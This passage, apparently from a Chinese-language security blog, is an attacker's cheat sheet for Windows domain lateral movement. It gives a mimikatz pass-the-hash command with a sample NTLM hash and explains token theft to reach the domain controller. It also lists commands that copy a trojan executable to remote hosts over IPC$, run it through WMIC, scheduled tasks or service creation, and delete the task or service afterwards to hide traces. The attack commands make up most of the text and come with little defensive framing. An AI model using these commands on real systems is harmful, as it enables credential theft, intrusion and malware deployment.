3.pass the hash 抓到密码破不出来就只能pth了,可以使用mimakatz
mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
但是打了KB2871997这个补丁后常规的pth不能用了,只能传递administrator这个账号(sid=500),但是可以使用mimikatz任意传递aes256
4.steal token 当你获取了本地计算机的system权限后,如果这台机器上有域用户跑的进程,就直接可以窃取域账号的token,然后从本地用户组跨入域环境。如果这台机器上有域管的开的进程,那么直接steal token后就可以登录域控了。
5.远程执行命令方法
copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件
WMIC远程运行命令
wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”
powershell remoting 执行命令
schtasks计划任务远程运行
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe
/sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host ##清除schtasks
SC添加服务远程运行命令
sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径
sc \\host start foobar ##启动建立的服务
sc \\host delete foobar ##完事后删除服务
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
THE END
暂无评论内容